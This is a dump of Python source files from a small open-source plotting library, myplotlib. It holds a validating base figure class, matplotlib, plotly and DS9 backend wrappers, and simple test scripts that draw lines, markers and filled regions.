Raises an error if it is not a valid option.\n\t\tvalid_aspects = ['equal']\n\t\tif aspect not in valid_aspects:\n\t\t\traise ValueError(f'<aspect> must be one of {valid_aspects}.')\n\t\n\tdef _validate_xy_are_arrays_of_numbers(self, x):\n\t\tif not hasattr(x, '__iter__'):\n\t\t\traise TypeError(f'<x> and <y> must be \"array-like\" objects, e.g. lists, numpy arrays, etc.')\n\t\n\tdef _validate_color(self, color):\n\t\ttry:\n\t\t\tcolor = tuple(color)\n\t\texcept:\n\t\t\traise TypeError(f'<color> must be an iterable composed of 3 numeric elements specifying RGB. Received {color} of type {type(color)}.')\n\t\tif len(color) != 3:\n\t\t\traise ValueError(f'<color> must be an iterable composed of 3 numeric elements specifying RGB. Received {color}.')\n\t\tfor rgb in color:\n\t\t\tif not 0 <= rgb <= 1:\n\t\t\t\traise ValueError(f'RGB elements in <color> must be bounded between 0 and 1, received <{color}>.')\n\t\n\tdef _validate_alpha(self, alpha):\n\t\ttry:\n\t\t\talpha = float(alpha)\n\t\texcept:\n\t\t\traise ValueError(f'<alpha> must be a float number. Received {alpha} of type {type(alpha)}.')\n\t\tif not 0 <= alpha <= 1:\n\t\t\traise ValueError(f'<alpha> must be bounded between 0 and 1, received <{alpha}>.')\n\t\n\tdef _validate_linewidth(self, linewidth):\n\t\ttry:\n\t\t\tlinewidth = float(linewidth)\n\t\texcept:\n\t\t\traise ValueError(f'<linewidth> must be a float number. Received {linewidth} of type {type(linewidth)}.')\n\t\n\tdef _validate_bins(self, bins):\n\t\tif isinstance(bins, int) and bins > 0:\n\t\t\treturn\n\t\telif hasattr(bins, '__iter__') and len(bins) > 0:\n\t\t\treturn\n\t\telif isinstance(bins, str):\n\t\t\treturn\n\t\telse:\n\t\t\traise TypeError(f'<bins> must be either an integer number, an array of float numbers or a string as defined for the numpy.histogram function, see https://numpy.org/doc/stable/reference/generated/numpy.histogram.html. 
Received {bins} of type {type(bins)}.')\n\t\n\tdef _validate_marker(self, marker):\n\t\tIMPLEMENTED_MARKERS = ['.', '+', 'x', 'o', None]\n\t\tif marker not in IMPLEMENTED_MARKERS:\n\t\t\traise ValueError(f'<marker> must be one of {IMPLEMENTED_MARKERS}, received \"{marker}\".')\n\t\n\tdef _validate_kwargs(self, **kwargs):\n\t\tif 'marker' in kwargs:\n\t\t\tself._validate_marker(kwargs['marker'])\n\t\tif kwargs.get('label') != None:\n\t\t\tif not isinstance(kwargs.get('label'), str):\n\t\t\t\traise TypeError(f'<label> must be a string.')\n\t\tif kwargs.get('color') != None:\n\t\t\tself._validate_color(kwargs['color'])\n\t\tif kwargs.get('alpha') != None:\n\t\t\tself._validate_alpha(kwargs['alpha'])\n\t\tif kwargs.get('linewidth') != None:\n\t\t\tself._validate_linewidth(kwargs['linewidth'])\n\t\tif kwargs.get('bins') is not None:\n\t\t\tself._validate_bins(kwargs['bins'])\n\t\tif kwargs.get('density') != None:\n\t\t\tif kwargs.get('density') not in [True, False]:\n\t\t\t\traise ValueError(f'<density> must be either True or False, received <{kwargs.get(\"density\")}>.')\n\t\tif 'norm' in kwargs:\n\t\t\tif kwargs['norm'] not in ['lin','log']:\n\t\t\t\traise ValueError(f'<norm> must be either \"lin\" or \"log\", received <{kwargs[\"norm\"]}> of type {type(kwargs[\"norm\"])}.')\n\t\n\t#### Plotting methods ↓↓↓↓\n\t\"\"\"\n\tPlotting methods here do not have to \"do the job\", they just validate\n\tthings and define the interface. 
Each subclass has to do the job.\n\tWhen implementing one of these plotting methods in a subclass, use\n\tthe same signature as here.\n\t\"\"\"\n\tdef plot(self, x, y=None, **kwargs):\n\t\tif 'plot' not in self.__class__.__dict__.keys(): # Raise error if the method was not overriden\n\t\t\traise NotImplementedError(f'<plot> not implemented for {type(self)}.')\n\t\timplemented_kwargs = ['label', 'marker', 'color', 'alpha', 'linestyle', 'linewidth'] # This is specific for the \"plot\" method.\n\t\tfor kwarg in kwargs.keys():\n\t\t\tif kwarg not in implemented_kwargs:\n\t\t\t\traise NotImplementedError(f'<{kwarg}> not implemented for <plot> by myplotlib.')\n\t\tself._validate_xy_are_arrays_of_numbers(x)\n\t\tif y is not None:\n\t\t\tself._validate_xy_are_arrays_of_numbers(y)\n\t\t\tif len(x) != len(y):\n\t\t\t\traise ValueError(f'Lengths of <x> and <y> are not the same, received len(x)={len(x)} and len(y)={len(y)}.')\n\t\telse:\n\t\t\ty = x\n\t\t\tx = [i for i in range(len(x))]\n\t\tif kwargs.get('color') is None:\n\t\t\tkwargs['color'] = self.pick_default_color()\n\t\tself._validate_kwargs(**kwargs)\n\t\tvalidated_args = kwargs\n\t\tvalidated_args['x'] = x\n\t\tvalidated_args['y'] = y\n\t\treturn validated_args\n\t\n\tdef hist(self, samples, **kwargs):\n\t\tif 'hist' not in self.__class__.__dict__.keys(): # Raise error if the method was not overriden\n\t\t\traise NotImplementedError(f'<hist> not implemented for {type(self)}.')\n\t\timplemented_kwargs = ['label', 'color', 'alpha', 'bins', 'density', 'linewidth', 'linestyle'] # This is specific for the \"hist\" method.\n\t\tfor kwarg in kwargs.keys():\n\t\t\tif kwarg not in implemented_kwargs:\n\t\t\t\traise NotImplementedError(f'<{kwarg}> not implemented for <hist> by myplotlib.')\n\t\tself._validate_xy_are_arrays_of_numbers(samples)\n\t\tif kwargs.get('color') is None:\n\t\t\tkwargs['color'] = self.pick_default_color()\n\t\tself._validate_kwargs(**kwargs)\n\t\t\n\t\tsamples = np.array(samples)\n\t\tcount, index = 
np.histogram(\n\t\t\tsamples[~np.isnan(samples)], \n\t\t\tbins = kwargs.get('bins') if kwargs.get('bins') is not None else 'auto',\n\t\t\tdensity = kwargs.get('density') if kwargs.get('density') != None else False,\n\t\t)\n\t\tcount = list(count)\n\t\tcount.insert(0,0)\n\t\tcount.append(0)\n\t\tindex = list(index)\n\t\tindex.insert(0,index[0] - np.diff(index)[0])\n\t\tindex.append(index[-1] + np.diff(index)[-1])\n\t\tindex += np.diff(index)[0]/2 # This is because np.histogram returns the bins edges and I want to plot in the middle.\n\t\t\n\t\tvalidated_args = kwargs\n\t\tvalidated_args['samples'] = samples\n\t\tvalidated_args['bins'] = index\n\t\tvalidated_args['counts'] = count\n\t\treturn validated_args\n\t\n\tdef colormap(self, z, x=None, y=None, **kwargs):\n\t\tif 'colormap' not in self.__class__.__dict__.keys(): # Raise error if the method was not overriden\n\t\t\traise NotImplementedError(f'<colormap> not implemented for {type(self)}.')\n\t\treturn self.validate_colormap_args(z=z, x=x, y=y, **kwargs)\n\t\n\tdef validate_colormap_args(self, z, x=None, y=None, **kwargs):\n\t\t# I had to wrote this function because \"contour\" validates the same arguments as \"colormap\", but calling \"self.colormap\" inside contour created problems calling the contour method of the subclasses.\n\t\timplemented_kwargs = ['alpha','norm', 'colorscalelabel'] # This is specific for the \"colormap\" method.\n\t\tfor kwarg in kwargs.keys():\n\t\t\tif kwarg not in implemented_kwargs:\n\t\t\t\traise NotImplementedError(f'<{kwarg}> not implemented for <colormap> by myplotlib.')\n\t\tself._validate_kwargs(**kwargs)\n\t\tvalidated_args = kwargs\n\t\tvalidated_args['x'] = x\n\t\tvalidated_args['y'] = y\n\t\tvalidated_args['z'] = z\n\t\treturn validated_args\n\t\n\tdef contour(self, z, x=None, y=None, **kwargs):\n\t\tif 'contour' not in self.__class__.__dict__.keys(): # Raise error if the method was not overriden\n\t\t\traise NotImplementedError(f'<contour> not implemented for 
{type(self)}.')\n\t\tif 'levels' in kwargs:\n\t\t\tlevels = kwargs['levels']\n\t\t\tif not isinstance(levels, int):\n\t\t\t\traise TypeError(f'<levels> must be an integer number specifying the number of levels for the contour plot, received {levels} of type {type(levels)}.')\n\t\tvalidated_args = self.validate_colormap_args(z, x, y, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tif 'levels' in locals():\n\t\t\tvalidated_args['levels'] = levels\n\t\treturn validated_args\n\t\n\tdef fill_between(self, x, y1, y2=None, **kwargs):\n\t\tif 'fill_between' not in self.__class__.__dict__.keys(): # Raise error if the method was not overriden\n\t\t\traise NotImplementedError(f'<fill_between> not implemented for {type(self)}.')\n\t\timplemented_kwargs = ['label', 'color', 'alpha', 'linestyle', 'linewidth'] # This is specific for the \"fill_between\" method.\n\t\tfor kwarg in kwargs.keys():\n\t\t\tif kwarg not in implemented_kwargs:\n\t\t\t\traise NotImplementedError(f'<{kwarg}> not implemented for <fill_between> by myplotlib.')\n\t\tself._validate_xy_are_arrays_of_numbers(x)\n\t\tself._validate_xy_are_arrays_of_numbers(y1)\n\t\tif y2 is None:\n\t\t\ty2 = np.zeros(len(x))\n\t\tself._validate_xy_are_arrays_of_numbers(y2)\n\t\tif kwargs.get('color') is None:\n\t\t\tkwargs['color'] = self.pick_default_color()\n\t\tself._validate_kwargs(**kwargs)\n\t\tvalidated_args = kwargs\n\t\tvalidated_args['x'] = x\n\t\tvalidated_args['y1'] = y1\n\t\tvalidated_args['y2'] = y2\n\t\tvalidated_args['alpha'] = .5 # Default alpha value.\n\t\treturn validated_args\n\t\n\tdef error_band(self, x, y, ytop, ylow, **kwargs):\n\t\tif 'error_band' not in self.__class__.__dict__.keys(): # Raise error if the method was not overriden\n\t\t\traise NotImplementedError(f'<error_band> not implemented for 
{type(self)}.')\n\t\tself._validate_xy_are_arrays_of_numbers(x)\n\t\tself._validate_xy_are_arrays_of_numbers(y)\n\t\tself._validate_xy_are_arrays_of_numbers(ytop)\n\t\tself._validate_xy_are_arrays_of_numbers(ylow)\n\t\tif any(np.array(y)>np.array(ytop)) or any(np.array(y)<np.array(ylow)):\n\t\t\traise ValueError(f'Either y>ytop or y<ylow is true for at least one point, please check your arrays.')\n\t\tif len(x) == len(y) == len(ytop) == len(ylow):\n\t\t\tpass\n\t\telse:\n\t\t\traise ValueError(f'len(x) == len(y) == len(ytop) == len(ylow) is not True, please check your arrays.')\n\t\tif kwargs.get('color') is None:\n\t\t\tkwargs['color'] = self.pick_default_color()\n\t\tself._validate_kwargs(**kwargs)\n\t\tvalidated_args = kwargs\n\t\tvalidated_args['x'] = x\n\t\tvalidated_args['y'] = y\n\t\tvalidated_args['ytop'] = ytop\n\t\tvalidated_args['ylow'] = ylow\n\t\treturn validated_args\n\n" }, { "alpha_fraction": 0.6844843029975891, "alphanum_fraction": 0.6905969381332397, "avg_line_length": 48.92856979370117, "blob_id": "006b1ef9182a185e3055165ee94b564d7e5547ff", "content_id": "7bfb7cb494204f6959eb86c6ac17b3af8c5070ee", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7689, "license_type": "permissive", "max_line_length": 188, "num_lines": 154, "path": "/myplotlib/wrapper_matplotlib.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "from .figure import MPLFigure\nimport numpy as np\n\nclass MPLMatplotlibWrapper(MPLFigure):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\timport matplotlib.pyplot as plt # Import here so if the user does not plot with this package, it does not need to be installed.\n\t\timport matplotlib.colors as colors # Import here so if the user does not plot with this package, it does not need to be installed.\n\t\tself.matplotlib_plt = plt\n\t\tself.matplotlib_colors = colors\n\t\tfig, ax = plt.subplots()\n\t\tax.grid(b=True, which='minor', color='#000000', 
alpha=0.1, linestyle='-', linewidth=0.25)\n\t\tself.matplotlib_fig = fig\n\t\tself.matplotlib_ax = ax\n\t\n\tdef set(self, **kwargs):\n\t\tsuper().set(**kwargs) # This does a validation of the arguments and stores them in the properties of the super() figure.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties. Now you must access like \"self.title\" and so.\n\t\tself.matplotlib_ax.set_xlabel(super().xlabel)\n\t\tself.matplotlib_ax.set_ylabel(super().ylabel)\n\t\tif self.xscale in [None, 'lin']:\n\t\t\tself.matplotlib_ax.set_xscale('linear')\n\t\telif self.xscale == 'log':\n\t\t\tself.matplotlib_ax.set_xscale('log')\n\t\tif self.yscale in [None, 'lin']:\n\t\t\tself.matplotlib_ax.set_yscale('linear')\n\t\telif self.yscale == 'log':\n\t\t\tself.matplotlib_ax.set_yscale('log')\n\t\tif self.title != None:\n\t\t\tself.matplotlib_fig.canvas.set_window_title(self.title)\n\t\t\tif self.show_title == True:\n\t\t\t\tself.matplotlib_fig.suptitle(self.title)\n\t\tif self.aspect == 'equal':\n\t\t\tself.matplotlib_ax.set_aspect('equal')\n\t\tif self.subtitle != None:\n\t\t\tself.matplotlib_ax.set_title(self.subtitle)\n\t\n\tdef show(self):\n\t\tself.matplotlib_plt.show()\n\t\n\tdef save(self, fname=None, *args, **kwargs):\n\t\tif fname is None:\n\t\t\tfname = self.title\n\t\tif fname is None:\n\t\t\traise ValueError(f'Please provide a name for saving the figure to a file by the <fname> argument.')\n\t\tif fname[-4] != '.': fname = f'{fname}.png'\n\t\tself.matplotlib_fig.savefig(facecolor=(1,1,1,0), fname=fname, *args, **kwargs)\n\t\n\tdef close(self):\n\t\tself.matplotlib_plt.close(self.matplotlib_fig)\n\t\n\tdef plot(self, x, y=None, **kwargs):\n\t\tvalidated_args = super().plot(x, y, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tx = validated_args.get('x')\n\t\ty = 
validated_args.get('y')\n\t\tvalidated_args.pop('x')\n\t\tvalidated_args.pop('y')\n\t\tself.matplotlib_ax.plot(x, y, **validated_args)\n\t\tif validated_args.get('label') != None: # If you gave me a label it is obvious for me that you want to display it, no?\n\t\t\tself.matplotlib_ax.legend()\n\t\n\tdef hist(self, samples, **kwargs):\n\t\tvalidated_args = super().hist(samples, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tvalidated_args['bins'] = np.array(validated_args['bins'][:-2]) + np.diff(validated_args['bins'])[:-1]/2 # This is to normalize the binning criteria with plotly.\n\t\tsamples = validated_args['samples']\n\t\tvalidated_args.pop('samples')\n\t\tvalidated_args.pop('counts') # Have no idea why I have to remove \"counts\", otherwise the next line raises a strange error.\n\t\tself.matplotlib_ax.hist(x = samples, histtype='step', **validated_args)\n\t\tif validated_args.get('label') != None: # If you provided a legend I assume you want to show it.\n\t\t\tself.matplotlib_ax.legend()\n\t\n\tdef hist2d(self, _______, **kwargs):\n\t\t# ~ validated_args = super().hist(samples, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\t# ~ del(kwargs) # Remove it to avoid double access to the properties.\n\t\traise NotImplementedError(f'<hist2d> not yet implemented for {self.__class__.__name__}')\n\t\n\tdef colormap(self, z, x=None, y=None, **kwargs):\n\t\tvalidated_args = super().colormap(z, x, y, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tz = np.array(validated_args.get('z'))\n\t\tvalidated_args.pop('z')\n\t\tx = validated_args.get('x')\n\t\tvalidated_args.pop('x')\n\t\ty = validated_args.get('y')\n\t\tvalidated_args.pop('y')\n\t\tif validated_args.get('norm') in [None, 'lin']: # linear normalization\n\t\t\tvalidated_args['norm'] = 
self.matplotlib_colors.Normalize(vmin=np.nanmin(z), vmax=np.nanmax(z))\n\t\telif validated_args.get('norm') == 'log':\n\t\t\ttemp = np.squeeze(np.asarray(z))\n\t\t\twhile temp.min() <= 0:\n\t\t\t\ttemp = temp[temp!=temp.min()]\n\t\t\tif (z<=0).any():\n\t\t\t\tz[z<=0] = float('Nan')\n\t\t\t\twarnings.warn('Warning: log color scale was selected and there are <z> values <= 0. They will be replaced by float(\"inf\") values for plotting (i.e. they will not appear in the plot).')\n\t\t\tvalidated_args['norm'] = self.matplotlib_colors.LogNorm(vmin=np.nanmin(z), vmax=np.nanmax(z))\n\t\t\tz[z!=z] = float('inf')\n\t\tif 'colorscalelabel' in validated_args:\n\t\t\tcolorscalelabel = validated_args.get('colorscalelabel')\n\t\t\tvalidated_args.pop('colorscalelabel')\n\t\tif x is None and y is None:\n\t\t\tcs = self.matplotlib_ax.pcolormesh(z, rasterized=True, shading='auto', cmap='Blues_r', **validated_args)\n\t\telif x is not None and y is not None:\n\t\t\tcs = self.matplotlib_ax.pcolormesh(x, y, z, rasterized=True, shading='auto', cmap='Blues_r', **validated_args)\n\t\telse: \n\t\t\traise ValueError('You must provide either \"both x and y\" or \"neither x nor y\"')\n\t\tcbar = self.matplotlib_fig.colorbar(cs)\n\t\tif 'colorscalelabel' in locals():\n\t\t\tcbar.set_label(colorscalelabel, rotation = 90)\n\t\n\tdef contour(self, z, x=None, y=None, **kwargs):\n\t\tvalidated_args = super().contour(z, x, y, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tz = np.array(validated_args.get('z'))\n\t\tvalidated_args.pop('z')\n\t\tx = validated_args.get('x')\n\t\tvalidated_args.pop('x')\n\t\ty = validated_args.get('y')\n\t\tvalidated_args.pop('y')\n\t\tif validated_args.get('norm') in [None, 'lin']: # linear normalization\n\t\t\tvalidated_args['norm'] = self.matplotlib_colors.Normalize(vmin=np.nanmin(z), vmax=np.nanmax(z))\n\t\telif validated_args.get('norm') == 'log':\n\t\t\ttemp = 
np.squeeze(np.asarray(z))\n\t\t\twhile temp.min() <= 0:\n\t\t\t\ttemp = temp[temp!=temp.min()]\n\t\t\tif (z<=0).any():\n\t\t\t\tz[z<=0] = float('Nan')\n\t\t\t\twarnings.warn('Warning: log color scale was selected and there are <z> values <= 0. They will be replaced by float(\"inf\") values for plotting (i.e. they will not appear in the plot).')\n\t\t\tvalidated_args['norm'] = self.matplotlib_colors.LogNorm(vmin=np.nanmin(z), vmax=np.nanmax(z))\n\t\t\tz[z!=z] = float('inf')\n\t\tif x is None and y is None:\n\t\t\tcs = self.matplotlib_ax.contour(z, rasterized=True, shading='auto', cmap='Blues_r', **validated_args)\n\t\telif x is not None and y is not None:\n\t\t\tcs = self.matplotlib_ax.contour(x, y, z, rasterized=True, shading='auto', cmap='Blues_r', **validated_args)\n\t\telse: \n\t\t\traise ValueError('You must provide either \"both x and y\" or \"neither x nor y\"')\n\t\tcbar = self.matplotlib_fig.colorbar(cs)\n\t\tif 'colorscalelabel' in locals():\n\t\t\tcbar.set_label(colorscalelabel, rotation = 90)\n\t\tself.matplotlib_ax.clabel(cs, inline=True, fontsize=10)\n\t\n\tdef fill_between(self, x, y1, y2=None, **kwargs):\n\t\tvalidated_args = super().fill_between(x, y1, y2, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tx = validated_args['x']\n\t\tvalidated_args.pop('x')\n\t\ty1 = validated_args['y1']\n\t\tvalidated_args.pop('y1')\n\t\ty2 = validated_args['y2']\n\t\tvalidated_args.pop('y2')\n\t\tself.matplotlib_ax.fill_between(x, y1, y2, **validated_args)\n\t\tif validated_args.get('label') != None: # If you gave me a label it is obvious for me that you want to display it, no?\n\t\t\tself.matplotlib_ax.legend()\n" }, { "alpha_fraction": 0.5837462544441223, "alphanum_fraction": 0.5867195129394531, "avg_line_length": 18.403846740722656, "blob_id": "7f5b6f07110c62be8a2a9d8bcd6c5311fbf0cfb2", "content_id": "fabb320c24ea9dc8fbcdc2551b622bdbd11388ee", "detected_licenses": 
[ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1009, "license_type": "permissive", "max_line_length": 56, "num_lines": 52, "path": "/tests/test_plot.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "import myplotlib as mpl\nimport numpy as np\n\nx = np.linspace(1,3)\ny = x**3\n\n\nfor package in ['matplotlib', 'plotly']:\n\tfig = mpl.manager.new(\n\t\ttitle = f'simple plot with {package}',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t)\n\tfig.plot(\n\t\tx,\n\t\ty,\n\t\tlabel = 'Simple plot',\n\t)\n\tfig = mpl.manager.new(\n\t\ttitle = f'Markers test {package}',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t)\n\tfor marker in ['.', '+', 'x', 'o']:\n\t\tfig.plot(\n\t\t\tx,\n\t\t\ty + np.random.randn(len(x)),\n\t\t\tmarker = marker,\n\t\t\tlabel = f'Markers {marker}',\n\t\t)\n\t\n\tfig = mpl.manager.new(\n\t\ttitle = f'Linestyle test {package}',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t)\n\tfor linestyle in ['solid', 'none', 'dashed', 'dotted']:\n\t\tfig.plot(\n\t\t\tx,\n\t\t\ty + np.random.randn(len(x)),\n\t\t\tmarker = '.',\n\t\t\tlinestyle = linestyle,\n\t\t\tlabel = f'Linestyle {linestyle}',\n\t\t)\n\nmpl.manager.save_all()\n" }, { "alpha_fraction": 0.5847457647323608, "alphanum_fraction": 0.6059321761131287, "avg_line_length": 15.275861740112305, "blob_id": "b978eeb9479b2eaac7875c1880ea284a094bc261", "content_id": "adc12fa52be335261bdcca8a565b40ea8ec78901", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 472, "license_type": "permissive", "max_line_length": 41, "num_lines": 29, "path": "/tests/test_fill_between.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "import myplotlib as mpl\nimport numpy as np\n\nx = 
np.linspace(-1,1)\ny = x**3\n\n\nfor package in ['matplotlib', 'plotly']:\n\tfig = mpl.manager.new(\n\t\ttitle = f'Fill between with {package}',\n\t\tsubtitle = f'This is a test',\n\t\txlabel = 'x axis',\n\t\tylabel = 'y axis',\n\t\tpackage = package,\n\t)\n\tfig.fill_between(\n\t\tx,\n\t\ty,\n\t\tlabel = 'Fill between 0 and y',\n\t)\n\tfig.fill_between(\n\t\tx,\n\t\ty*1.1,\n\t\ty*.9,\n\t\tlabel = 'Fill between two curves',\n\t\tcolor = (0,0,0),\n\t)\n\nmpl.manager.save_all()\n" }, { "alpha_fraction": 0.6800428032875061, "alphanum_fraction": 0.6832530498504639, "avg_line_length": 36.380001068115234, "blob_id": "44ecef8a991c9621f8ad1729d63b11231e8dc452", "content_id": "257da8648168c9c42a333257d570df87bac6dfbc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1869, "license_type": "permissive", "max_line_length": 122, "num_lines": 50, "path": "/myplotlib/wrapper_saods9.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "from .figure import MPLFigure\n\nclass MPLSaoImageDS9Wrapper(MPLFigure):\n\t\"\"\"\n\tThis is a very specific type of figure, intended to be used with \n\timages.\n\t\"\"\"\n\tDIRECTORY_FOR_TEMPORARY_FILES = '.myplotlib_ds9_temp'\n\t_norm = 'lin'\n\t\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\timport os\n\t\tself.os = os\n\t\tfrom astropy.io import fits\n\t\tself.astropy_io_fits = fits\n\t\tif not self.os.path.isdir(self.DIRECTORY_FOR_TEMPORARY_FILES):\n\t\t\tself.os.makedirs(self.DIRECTORY_FOR_TEMPORARY_FILES)\n\t\n\t@property\n\tdef title(self):\n\t\treturn self._title.replace(' ', '_')\n\t\n\tdef colormap(self, z, x=None, y=None, **kwargs):\n\t\tvalidated_args = super().colormap(z, x, y, **kwargs) # Validate arguments according to the standards of myplotlib.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties.\n\t\tz = np.array(validated_args.get('z'))\n\t\thdul_new = self.astropy_io_fits.PrimaryHDU(z)\n\t\tif f'{self.title}.fits' in 
self.os.listdir(self.DIRECTORY_FOR_TEMPORARY_FILES):\n\t\t\tself.os.remove(f'{self.DIRECTORY_FOR_TEMPORARY_FILES}/{self.title}.fits')\n\t\thdul_new.writeto(f'{self.DIRECTORY_FOR_TEMPORARY_FILES}/{self.title}.fits')\n\t\tif 'norm' in validated_args and validated_args['norm'] == 'log':\n\t\t\tself._norm = 'log'\n\t\n\tdef show(self):\n\t\tself.os.system(f'ds9 {self.DIRECTORY_FOR_TEMPORARY_FILES}/{self.title}.fits' + (' -log' if self._norm == 'log' else ''))\n\t\n\tdef close(self):\n\t\tif len(self.os.listdir(self.DIRECTORY_FOR_TEMPORARY_FILES)) == 0:\n\t\t\tself.os.rmdir(self.DIRECTORY_FOR_TEMPORARY_FILES)\n\t\tself.__del__()\n\t\n\tdef __del__(self):\n\t\tif self.os.path.exists(f'{self.DIRECTORY_FOR_TEMPORARY_FILES}/{self.title}.fits'):\n\t\t\tself.os.remove(f'{self.DIRECTORY_FOR_TEMPORARY_FILES}/{self.title}.fits')\n\t\n\tdef save(self, fname):\n\t\tif fname[:-5] != '.fits':\n\t\t\tfname = '.'.join(fname.split('.')[:-1] + ['fits'])\n\t\tcopyfile(f'{self.DIRECTORY_FOR_TEMPORARY_FILES}/{self.title}.fits', fname)\n" }, { "alpha_fraction": 0.5693069100379944, "alphanum_fraction": 0.5767326951026917, "avg_line_length": 15.15999984741211, "blob_id": "4bd1f66c4d0272b0fa466d56b9e0488dcdb197cc", "content_id": "90b38ce9790e71cfd878e5878d09e755e1891c46", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 404, "license_type": "permissive", "max_line_length": 40, "num_lines": 25, "path": "/tests/test_markers.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "import myplotlib as mpl\nimport numpy as np\n\nx = np.linspace(0,1)\n\nfor package in ['plotly', 'matplotlib']:\n\tfig = mpl.manager.new(\n\t\ttitle = 'Markers test',\n\t\tpackage = package,\n\t)\n\tfig.plot(\n\t\tx,\n\t\tx**3,\n\t\tlabel = 'No markers',\n\t)\n\tfor marker in ['.','x','+','o']:\n\t\tfig.plot(\n\t\t\tx,\n\t\t\tx**np.random.rand(),\n\t\t\tmarker = marker,\n\t\t\tlabel = f'Marker = {marker}',\n\t\t\tlinestyle = 
'',\n\t\t)\n\nmpl.manager.show()\n" }, { "alpha_fraction": 0.6421740055084229, "alphanum_fraction": 0.6497148871421814, "avg_line_length": 37.28873062133789, "blob_id": "7845abf6e4991ff5d16914d4072df922552cdbc9", "content_id": "1c2a80e06b7f3788d7d742f70e311687b6357e75", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10874, "license_type": "permissive", "max_line_length": 369, "num_lines": 284, "path": "/myplotlib/wrapper_plotly.py", "repo_name": "SengerM/myplotlib", "src_encoding": "UTF-8", "text": "from .figure import MPLFigure\nimport numpy as np\n\nclass MPLPlotlyWrapper(MPLFigure):\n\tLINESTYLE_TRANSLATION = {\n\t\t'solid': None,\n\t\t'none': None,\n\t\t'dashed': 'dash',\n\t\t'dotted': 'dot',\n\t}\n\t\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\timport plotly.graph_objects as go # Import here so if the user does not plot with this package, it does not need to be installed.\n\t\timport plotly # Import here so if the user does not plot with this package, it does not need to be installed.\n\t\tself.plotly_go = go\n\t\tself.plotly = plotly\n\t\tself.plotly_fig = go.Figure()\n\t\n\tdef set(self, **kwargs):\n\t\tsuper().set(**kwargs) # This does a validation of the arguments and stores them in the properties of the super() figure.\n\t\tdel(kwargs) # Remove it to avoid double access to the properties. 
Now you must access like \"self.title\" and so.\n\t\tif self.show_title == True and self.title != None:\n\t\t\tself.plotly_fig.update_layout(title = self.title)\n\t\tself.plotly_fig.update_layout(\n\t\t\txaxis_title = self.xlabel,\n\t\t\tyaxis_title = self.ylabel,\n\t\t)\n\t\t# Axes scale:\n\t\tif self.xscale in [None, 'lin']:\n\t\t\tpass\n\t\telif self.xscale == 'log':\n\t\t\tself.plotly_fig.update_layout(xaxis_type = 'log')\n\t\tif self.yscale in [None, 'lin']:\n\t\t\tpass\n\t\telif self.yscale == 'log':\n\t\t\tself.plotly_fig.update_layout(yaxis_type = 'log')\n\t\t\n\t\tif self.aspect == 'equal':\n\t\t\tself.plotly_fig.update_yaxes(\n\t\t\t\tscaleanchor = \"x\",\n\t\t\t\tscaleratio = 1,\n\t\t\t)\n\t\t\n\t\tif self.subtitle != None:\n\t\t\tself.plotly_fig.add_annotation(\n\t\t\t\ttext = self.subtitle.replace('\\n','<br>'),\n\t\t\t\txref = \"paper\", \n\t\t\t\tyref = \"paper\",\n\t\t\t\tx = .5, \n\t\t\t\ty = 1,\n\t\t\t\talign = 'left',\n\t\t\t\tarrowcolor=\"#ffffff\",\n\t\t\t\tfont=dict(\n\t\t\t\t\tfamily=\"Courier New, monospace\",\n\t\t\t\t\tcolor=\"#999999\"\n\t\t\t\t),\n\t\t\t)\n\t\n\tdef show(self):\n\t\tself.plotly_fig.show()\n\t\n\tdef save(self, fname, include_plotlyjs='cdn', *args, **kwargs):\n\t\tif fname is None:\n\t\t\tfname = self.title\n\t\tif fname is None:\n\t\t\traise ValueError(f'Please provide a name for saving the figure to a file by the <fname> argument.')\n\t\tif fname[-5:] != '.html':\n\t\t\tif len(fname.split('.')) > 1:\n\t\t\t\tsplitted = fname.split('.')\n\t\t\t\tsplitted[-1] = 'html'\n\t\t\t\tfname = '.'.join(splitted)\n\t\t\telse:\n\t\t\t\tfname = f'{fname}.html'\n\t\tself.plotly.offline.plot(\n\t\t\tself.plotly_fig, \n\t\t\tfilename = fname,\n\t\t\tauto_open = False, \n\t\t\tinclude_plotlyjs = include_plotlyjs,\n\t\t\t*args, \n\t\t\t**kwargs\n\t\t)\n\t\n\tdef close(self):\n\t\tdel(self.plotly_fig)\n\t\n\tdef plot(self, x, y=None, **kwargs):\n\t\tvalidated_args = super().plot(x, y, **kwargs) # Validate arguments according to the 
